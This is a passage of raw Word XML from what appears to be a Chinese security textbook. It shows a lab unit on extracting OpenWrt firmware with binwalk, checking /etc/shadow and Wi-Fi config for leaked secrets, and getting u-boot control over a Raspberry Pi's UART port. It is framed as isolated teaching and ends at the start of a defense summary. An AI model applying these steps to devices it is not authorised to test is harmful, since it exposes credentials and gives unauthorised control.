      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-57 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关于密钥用途与防重放的建议。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="377"/>
    <w:bookmarkStart w:id="378" w:name="靶机实操单元固件分析与-uart-调试口利用通用思路"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机/实操单元：固件分析与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口利用（通用思路）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实验声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本单元所有操作均在自建隔离实验室中完成，设备为自行购买的开源开发板或从公开可信源获取的授权教学固件镜像。不针对任何市售品牌产品。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实验目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：体验从获取一个固件镜像到静态分析查找敏感信息，以及连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口观察启动日志的全过程，建立“硬件攻击面分析”的基本手感。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">环境与工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">树莓派（任意型号，作为被调试设备）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ESP32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开发板，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TTL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FT232RL，3.3V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">电平），杜邦线若干。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宿主机安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">minicom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">screen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于串口通信，安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">binwalk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hexdump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于固件分析。固件样本可从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenWrt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官网下载兼容树莓派的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固件包，或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ESP-IDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">示例工程编译生成的二进制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">万用表（电压/通断档）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令（环境值均用占位符）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：固件获取与解包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 下载 OpenWrt 固件（以树莓派 4B 为例，地址为示例，非真实路径）②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://downloads.openwrt.org/releases/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/targets/bcm27xx/bcm2711/openwrt-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-bcm2711-rpi-4-ext4-factory.img.gz</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> openwrt-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-bcm2711-rpi-4-ext4-factory.img.gz</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> openwrt-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-bcm2711-rpi-4-ext4-factory.img </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看镜像结构</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 使用 binwalk 提取文件系统</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">binwalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-Me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> openwrt-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-bcm2711-rpi-4-ext4-factory.img</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取后会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_openwrt-...extracted/squashfs-root/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录下见到完整的根文件系统。可手动检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/config/wireless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等文件，体会敏感信息可能泄露的途径。例如，某版本固件可能在配置文件中包含默认的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码哈希或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wi-Fi PSK。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：UART</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">连接与调试日志观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将树莓派关机，用杜邦线连接其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">14（TXD）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">15（RXD）到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转串口模块的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RXD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TXD（交叉连接），并共地（GND）。树莓派的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常工作在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3V，若串口模块支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">切换，确保已设置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在宿主机启动串口终端：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash  sudo screen /dev/ttyUSB0 115200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/ttyUSB0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是模块在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的典型设备文件，实际可能为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/ttyUSB1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/ttyAMA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，波特率</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 115200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是常见值，部分设备可能使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9600 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 57600。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">给树莓派上电，串口终端应出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息和内核启动日志。观察输出的内核版本、初始化流程、挂载的文件系统类型等。对于某些未修改配置的开发板，启动后可能直接进入登录提示，甚至自动以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互机会（一般提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Hit any key to stop autoboot”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），在上电瞬间不断按键盘空格或回车，尝试中断自动启动，进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令行。此时可运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看环境变量，甚至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取内存/闪存内容，这是更深层次的硬件级控制③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">串口无任何输出：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TX/RX/GND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接是否正确、是否交叉、GND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否遗漏；更换波特率尝试；确认设备是否已启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UART（树莓派需在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_uart=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出乱码：波特率或电压电平不匹配。用逻辑分析仪观测信号，精确测量波特率。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- binwalk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法提取文件系统：固件可能使用了非标准压缩或加密，可尝试用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hexdump -C &lt;file&gt; | head</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看魔术字判断类型。对于加密固件，此教学实验不要求破解。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="378"/>
    <w:bookmarkStart w:id="379" w:name="防御总结框整体"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御总结框（整体）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节揭示的三类攻击映射到一条核心防御链：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">保护固件免遭提取与篡改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
